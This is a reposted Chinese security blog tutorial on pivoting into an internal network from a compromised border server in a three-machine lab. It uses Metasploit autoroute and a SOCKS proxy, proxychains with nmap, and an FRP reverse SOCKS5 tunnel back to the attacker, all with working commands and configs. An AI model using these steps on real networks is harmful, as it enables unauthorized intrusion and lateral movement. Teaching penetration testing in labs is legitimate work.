美少妇和FRP做代理进内网遨游

admin 2024年10月18日22:05:10评论18 views字数 2771阅读9分14秒阅读模式

省护刚结束,实在没时间......

MSF 搭建代理

让我们来瞧一瞧 MSF 的代理如何搭建,代理之前的攻击步骤我们就先省略了哈,这里主要关注攻击成功后如何搭建和使用代理。

代理的基本原理和使用场景上次介绍了,如下:

疑惑.png | 代理技术&隧道技术,是同一个东西?

一共三台设备

Kali(攻击机):192.168.49.139

CentOS7(边界服务器):192.168.49.191、192.168.52.137

Windows Server 2016(内网服务器):192.168.52.138

设备连通性:Kali → CentOS7 → Windows Server 2016

操练起来

背景是 CentOS7 作为目标网络的边界服务器已经被我们拿到了系统权限,接下来我们想以这个服务器为跳板攻击内网设备,拿内网设备权限。

首先我们得到了 CentOS7 的 meterpreter
美少妇和FRP做代理进内网遨游
接下来获取内网路由信息
run get_local_subnets

发现存在 49.0 和 52.0 两个网段,49.0 是我们可以正常访问的,52.0 是无法直接访问的,所以接下来我们就是要通过代理技术访问到 52.0 网段。

美少妇和FRP做代理进内网遨游
基于当前会话添加去往内网网段的路由
run post/multi/manage/autoroute

run autoroute -s 192.168.52.0/24
美少妇和FRP做代理进内网遨游
查看路由是否添加成功
run autoroute -p

此时 MSF 就可以利用这个路由访问内网其它设备了,但是如果还想除了 MSF 以外的工具或攻击设备也能访问内网,这个时候就需要派代理上场了。

美少妇和FRP做代理进内网遨游
将会话挂起,准备搭建代理
bg
美少妇和FRP做代理进内网遨游
搜索用于搭建代理的模块
search socks
美少妇和FRP做代理进内网遨游
选择模块
use auxiliary/server/socks_proxy
美少妇和FRP做代理进内网遨游
设置相关参数并生成代理
set srvhost 0.0.0.0  # 设置代理的 IP(默认就是四个 0,所以可以不配)

set username admin  # 设置代理的账号(可选)

set password 123.com # 设置代理的密码(可选)

run -d  # 生成代理
美少妇和FRP做代理进内网遨游
查看代理
jobs
美少妇和FRP做代理进内网遨游
在 kali 自带的代理工具 proxychains 配置文件中配置好代理
vim /etc/proxychains4.conf

最后一行添加:

socks5 192.168.49.139 1080 admin 123.com

然后保存退出

美少妇和FRP做代理进内网遨游
接下来使用代理扫描内网主机
proxychains4 nmap 192.168.52.0/24 -sT -Pn

proxychains4 nmap 192.168.52.138 -sT -Pn

重新开一个命令行窗口执行上述命令,这里相当于让 nmap 使用代理访问内网,一个是扫网段、一个是扫具体目标,此时访问内网的流量会从 CentOS7 发出,这里可以将 kali 和 CentOS7 视为一体。

美少妇和FRP做代理进内网遨游

这中间还有很多扫描信息......由于太多了,所以我只截取了最上面和最下面部分内容

美少妇和FRP做代理进内网遨游

成功扫描到目标主机开放了 80、135、139、445、3306 端口。

其它工具或设备此时也可以通过 kali 的代理访问内网设备。

比如物理机浏览器配置 kali 代理

美少妇和FRP做代理进内网遨游

使用物理机访问内网

美少妇和FRP做代理进内网遨游

成功!

ok,美少妇完事!

FRP 代理

这里再看一下 FRP 的内网代理吧,也就是之前 FRP 文章中说的"黑客也都会用这个工具做攻击",但是当时没有演示到这部分内容。

frp | 开源内网穿透利器,速速用起来

一共三台设备

Kali(攻击机):192.168.49.139

CentOS7(边界服务器):192.168.49.191、192.168.52.137

Windows Server 2016(内网服务器):192.168.52.138

设备连通性:Kali → CentOS7 → Windows Server 2016

操练起来

服务端(攻击端设备 Kali)

frps 放入服务端。

创建 frps.toml,将以下内容放进去。

bindPort = 5555          #绑定的端口
auth.token = "sdjf89734lkjsdf987234"             #客户端服务端连接的密码
美少妇和FRP做代理进内网遨游
客户端(被攻击端边界服务器 CentOS7)

frpc 放入客户端。

创建 frpc.toml,将以下内容放进去。

serverAddr = "192.168.49.139"
serverPort = 5555           #服务器绑定的端口
auth.token = "sdjf89734lkjsdf987234"                #连接的密码
healthCheck.type = "tcp" #启用健康检查,类型为 tcp
healthCheck.intervalSeconds = 100 #每隔 100 秒进行一次健康检查

[[proxies]]
name = "socks5"
type = "tcp"
remotePort = 6666           #代理的端口
transport.useEncryption = true         #是否加密
transport.useCompression = true  #传输内容是否进行压缩
[proxies.plugin]
type = "socks5"
美少妇和FRP做代理进内网遨游
分别启动服务端和客户端
./frps -c frps.toml

./frpc -c frpc.toml

如果提示权限不够就先给权限:chmod 777 frpc

接下来就可以遨游内网了

在 kali 上配置好代理

# 代理 IP 和端口
192.168.49.139:6666
美少妇和FRP做代理进内网遨游

然后访问内网的 Windows Server 2016

# 浏览器访问内网
http://192.168.52.138
美少妇和FRP做代理进内网遨游

成功!

其它工具或设备此时也可以通过 kali 的代理访问内网设备。

比如物理机浏览器配置 kali 代理,然后使用物理机访问内网,操作和前面一样一样的,不赘述了。

ok,FRP 完事!

话说这个短剧为啥这么火?有人看嘛?

关注公众号,发送消息"代理"获取环境和工具

美少妇和FRP做代理进内网遨游

END

墙裂推荐!!一键更换Linux优质的软件源和docker源,要多方便有多方便
frp | 开源内网穿透利器,速速用起来
大闹天宫 | 被安全社区誉为可以“黑掉整个宇宙”的神器-1
Metasploit漏洞利用 | 被安全社区誉为可以“黑掉整个宇宙”的神器-2
Metasploit木马生成 | 被安全社区誉为可以“黑掉整个宇宙”的神器-3
内网渗透 | MSF&FRP | 无法直接访问的目标如何通过搭建代理进一步渗透?
目标网络限制严格CS拿不到权限怎么办?试试这个高级玩法—隧道上线
王炸组合 | 内网渗透隧道技术!DNS+FRP如何绕过防护干进内网
点击关
美少妇和FRP做代理进内网遨游
!

原文始发于微信公众号(大伯为安全):美少妇和FRP做代理进内网遨游

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月18日22:05:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   美少妇和FRP做代理进内网遨游https://cn-sec.com/archives/3286477.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息